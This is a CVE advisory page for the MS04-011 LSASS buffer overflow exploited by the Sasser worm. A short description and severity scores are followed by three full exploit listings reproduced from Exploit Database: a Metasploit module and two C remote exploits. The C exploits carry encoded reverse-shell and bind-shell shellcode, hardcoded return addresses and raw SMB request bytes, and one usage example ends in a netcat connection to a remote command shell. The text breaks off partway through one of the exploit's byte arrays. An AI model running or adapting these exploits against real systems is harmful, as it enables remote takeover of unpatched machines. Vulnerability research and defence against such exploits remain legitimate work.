Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 16368
Publication date : 2010-07-02 22h00 +00:00
Author : Metasploit
EDB Verified : Yes
##
# $Id: ms04_011_lsass.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
#
# This module exploits a vulnerability in the LSASS service
#
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the LSASS service, this vulnerability
was originally found by eEye. When re-exploiting a Windows XP system, you will need
need to run this module twice. DCERPC request fragmentation can be performed by setting
'FragSize' parameter.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9669 $',
'References' =>
[
[ 'CVE', '2003-0533' ],
[ 'OSVDB', '5248' ],
[ 'BID', '10108' ],
[ 'MSB', 'MS04-011' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Automatic
[
'Automatic Targetting',
{
'Rets' => [ ],
},
],
# Windows 2000
[
'Windows 2000 English',
{
'Rets' => [ 0x773242e0 ],
},
],
# Windows XP
[
'Windows XP English',
{
'Rets' => [ 0x7449bf1a ],
},
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 13 2004'))
end
def exploit
connect()
smb_login()
handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
print_status("Binding to #{handle}...")
dcerpc_bind(handle)
print_status("Bound to #{handle}...")
print_status('Getting OS information...')
# Check the remote OS name and version
os = smb_peer_os
buff = ''
case os
# Windows 2000 requires that the string be unicode formatted
# and give us a nice set of registers which point back to
# the un-unicoded data. We simply return to a nop sled that
# jumps over the return address, some trash, and into the
# final payload. Easy as pie.
when /Windows 5\.0/
str = rand_text_alphanumeric(3500)
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
str[2104, payload.encoded.length ] = payload.encoded
buff = NDR.UnicodeConformantVaryingString(str)
# Windows XP is a bit different, we need to use an ascii
# buffer and a jmp esp. The esp register points to an
# eight byte segment at the end of our buffer in memory,
# we make these bytes jump back to the beginning of the
# buffer, giving us about 1936 bytes of space for a
# payload.
when /Windows 5\.1/
str = rand_text_alphanumeric(7000) + "\x00\x00"
str[0, payload.encoded.length ] = payload.encoded
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
str[6998, 2] = "\x00\x00"
buff = NDR.UnicodeConformantVaryingStringPreBuilt(str)
# Unsupported target
else
print_status("No target is available for #{ os }")
return
end
stub = buff +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
rand_text(528) +
rand_text(528) +
NDR.long(rand(0xFFFFFF))
print_status("Trying to exploit #{os}")
begin
response = dcerpc_call(9, stub)
rescue Rex::Proto::DCERPC::Exceptions::NoResponse
print_status('Server did not respond, but that should be ok...')
rescue Rex::Proto::DCERPC::Exceptions::Fault
case $!.fault
when 0x1c010002
print_status('Server appears to have been patched')
else
print_status("Unexpected DCERPC fault 0x%.8x" % $!.fault)
end
end
# Perform any required client-side payload handling
handler
end
end
Exploit Database EDB-ID : 293
Publication date : 2004-04-23 22h00 +00:00
Author : sbaa
EDB Verified : Yes
#include <windows.h>
#pragma comment(lib,"mpr.lib")
#pragma comment(lib, "ws2_32")
unsigned char scode[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";
unsigned char scode2[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
typedef int (_stdcall *DSROLEUPGRADEDOWNLEVELSERVER)
(unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long,
unsigned long, unsigned long, unsigned long, unsigned long);
DSROLEUPGRADEDOWNLEVELSERVER DsRoleUpgradeDownlevelServer;
#define LEN 3500
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char buf2[2];
char target2[200];
int main(int argc, char *argv[])
{
HMODULE hNetapi;
int ret=0;
int i;
char c, *target;
LPSTR hostipc[40];
NETRESOURCE netResource;
unsigned short port;
unsigned long ip;
unsigned char* sc;
if (argc < 3) {
printf("Windows Lsasrv.dll RPC [ms04011] buffer overflow Remote Exploit\n \bug discoveried by eEye,\n \
code by sbaa (sysop sbaa 3322 org) 2004/04/24 ver 0.1\n \
Usage: \n \
%s 0 targetip (Port ConnectBackIP ) \
----> attack 2k (tested on cn sp4,en sp4)\n \
%s 1 targetip (Port ConnectBackIP ) \
----> attack xp (tested on cn sp1)\n",argv[0],argv[0]);
printf("");
return 0;
}
target = argv[2];
sprintf((char *)hostipc,"\\\\%s\\ipc$",target);
netResource.lpLocalName = NULL;
netResource.lpProvider = NULL;
netResource.dwType = RESOURCETYPE_ANY;
netResource.lpRemoteName=(char *)hostipc;
ret = WNetAddConnection2(&netResource, "", "", 0); // attempt a null session
if (ret != 0)
{
printf("Create NULL session failed\n");
// return 1;
}
hNetapi = LoadLibrary("sbaaNetapi.dll");
if (!hNetapi) {
printf("Can't load sbaaNetapi.dll.\n");
exit(0);
}
(DWORD *)DsRoleUpgradeDownlevelServer = (DWORD *)GetProcAddress(hNetapi, "DsRoleUpgradeDownlevelServer");
if (!DsRoleUpgradeDownlevelServer) {
printf("Can't find function.\n");
exit(0);
}
memset(buf, '\x90', LEN);
if(argc>4)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[4])^(ULONG)0x99999999;
memcpy(&scode[118], &port, 2);
memcpy(&scode[111], &ip, 4);
sc=scode;
}
else
{
if(argc>3)
{
port = htons(atoi(argv[3]))^(USHORT)0x9999;
memcpy(&scode2[176], &port, 2);
}
sc=scode2;
}
//attack all 2k sp3 version
memcpy(&buf[2020], "\x95\x0c\x01\x78", 4);
memcpy(&buf[2036], sc, strlen(sc));
//attack all 2k sp4 version
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844],"\x2b\x38\x03\x78",4);
memcpy(&buf[2856], sc, strlen(sc));
printf("shellcode size %d\n", strlen(sc));
for(i=0; i<LEN; i++) { //unicode
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
if(atoi(argv[1])==1)
{
memcpy(&sendbuf, sc, strlen(sc));
memcpy(sendbuf+1964,"\xad\x14\x48\x74",4);
memcpy(&sendbuf[1948], "\xb8\x44\xf8\xff\xff\x03\xc4\x81\xec\x00\x20\x00\x00\xff\xe0\x00", 16);
memcpy(&sendbuf[1980], "\xeb\xde",2);
}
memset(target2, 0, 100);
for(i=0; i<strlen(target); i++) {
target2[i*2] = target[i];
target2[i*2+1] = 0;
}
memset(buf2, 0, 2);
ret=0;
ret=DsRoleUpgradeDownlevelServer(&sendbuf[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0], &buf2[0],
&buf2[0], &buf2[0], target2, &buf2[0], &buf2[0], &buf2[0]);
printf("Ret value = %d\n",ret);
WNetCancelConnection2(netResource.lpRemoteName, 0, TRUE);
FreeLibrary(hNetapi);
return 0;
}
// milw0rm.com [2004-04-24]
Exploit Database EDB-ID : 295
Publication date : 2004-04-28 22h00 +00:00
Author : houseofdabus
EDB Verified : Yes
/* HOD-ms04011-lsasrv-expl.c:
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit
* Version 0.1 coded by
*
*
* .::[ houseofdabus ]::.
*
*
* -------------------------------------------------------------------
* Usage:
*
* expl <target> <victim IP> <bindport> [connectback IP] [options]
*
* Targets:
* 0 [0x01004600]: WinXP Professional [universal] lsass.exe
* 1 [0x7515123c]: Win2k Professional [universal] netrap.dll
* 2 [0x751c123c]: Win2k Advanced Server [SP4] netrap.dll
*
* Options:
* -t: Detect remote OS:
* Windows 5.1 - WinXP
* Windows 5.0 - Win2k
* -------------------------------------------------------------------
*
* Tested on
* - Windows XP Professional SP0 English version
* - Windows XP Professional SP0 Russian version
* - Windows XP Professional SP1 English version
* - Windows XP Professional SP1 Russian version
* - Windows 2000 Professional SP2 English version
* - Windows 2000 Professional SP2 Russian version
* - Windows 2000 Professional SP4 English version
* - Windows 2000 Professional SP4 Russian version
* - Windows 2000 Advanced Server SP4 English version
* - Windows 2000 Advanced Server SP4 Russian version
*
*
* Example:
*
* C:\HOD-ms04011-lsasrv-expl 0 192.168.1.10 4444 -t
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: WinXP Professional [universal] lsass.exe
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Detecting remote OS: Windows 5.0
*
*
* C:\HOD-ms04011-lsasrv-expl 1 192.168.1.10 4444
*
* MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Target: IP: 192.168.1.10: OS: Win2k Professional [universal] netrap.dll
* [*] Connecting to 192.168.1.10:445 ... OK
* [*] Attacking ... OK
*
* C:\nc 192.168.1.10 4444
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
*
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
*/
#include <windows.h>
#pragma comment(lib, "ws2_32")
// reverse shellcode
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x9D"
"\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\xF3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\xAA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C"
"\x57\x76\x57\x79\xF9\x52\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";
// bind shellcode
unsigned char bindshell[] =
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
"\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A"
"\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6"
"\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D"
"\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A"
"\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58"
"\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0"
"\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41"
"\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B"
"\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D"
"\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA"
"\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10"
"\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF"
"\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8"
"\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79"
"\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C"
"\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59"
"\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD"
"\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC"
"\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5"
"\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6"
"\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0"
"\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED"
"\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99";
char req1[] =
"\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F"
"\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02"
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F"
"\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70"
"\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30"
"\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54"
"\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";
char req2[] =
"\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00"
"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00"
"\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00"
"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00"
"\x2E\x00\x30\x00\x00\x00\x00\x00";
char req3[] =
"\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00"
"\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E"
"\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46"
"\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40"
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40"
"\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48"
"\x00\x4F\x00\x44\x00\x00\x81\x19\x6A\x7A\xF2\xE4\x49\x1C\x28\xAF"
"\x30\x25\x74\x10\x67\x53\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00"
"\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00"
"\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00"
"\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";
char req4[] =
"\x00\x00\x00\x5C\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE"
"\x00\x08\x30\x00\x04\xFF\x00\x5C\x00\x08\x00\x01\x00\x31\x00\x00"
"\x5C\x00\x5C\x00\x31\x00\x39\x00\x32\x00\x2E\x00\x31\x00\x36\x00"
"\x38\x00\x2E\x00\x31\x00\x2E\x00\x32\x00\x31\x00\x30\x00\x5C\x00"
"\x49\x00\x50\x00\x43\x00\x24"
"\x00\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";
char req5[] =
"\x00\x00\x00\x64\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04"
"\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x0E\x00\x16\x00\x00\x00"
"\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00"
"\x02\x00\x00\x00\x03\x11\x00\x00\x5C\x00\x6C\x00\x73\x00\x61\x00"
"\x72\x00\x70\x00\x63\x00\x00\x00";
char req6[] =
"\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04"
"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x04\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02"
"\x00\x26\x00\x00\x40\x59\x00\x10\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x0B\x03\x10\x00\x00\x00"
"\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00"
"\x01\x00\x00\x00\x00\x00\x01\x00\x6A\x28\x19\x39\x0C\xB1\xD0\x11"
"\x9B\xA8\x00\xC0\x4F\xD9\x2E\xF5\x00\x00\x00\x00\x04\x5D\x88\x8A"
"\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";
char req7[] =
"\x00\x00\x0C\xF4\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\xDC\x04"
"\x00\x08\x60\x00\x10\x00\x00\xA0\x0C\x00\x00\x00\x04\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\xA0\x0C\x54\x00\x02"
"\x00\x26\x00\x00\x40\xB1\x0C\x10\x5C\x00\x50\x00\x49\x00\x50\x00"
"\x45\x00\x5C\x00\x00\x00\x00\x00\x05\x00\x00\x03\x10\x00\x00\x00"
"\xA0\x0C\x00\x00\x01\x00\x00\x00\x88\x0C\x00\x00\x00\x00\x09\x00"
"\xEC\x03\x00\x00\x00\x00\x00\x00\xEC\x03\x00\x00";
// room for shellcode here ...
char shit1[] =
"\x95\x14\x40\x00\x03\x00\x00\x00\x7C\x70\x40\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x7C\x70\x40\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x7C\x70\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
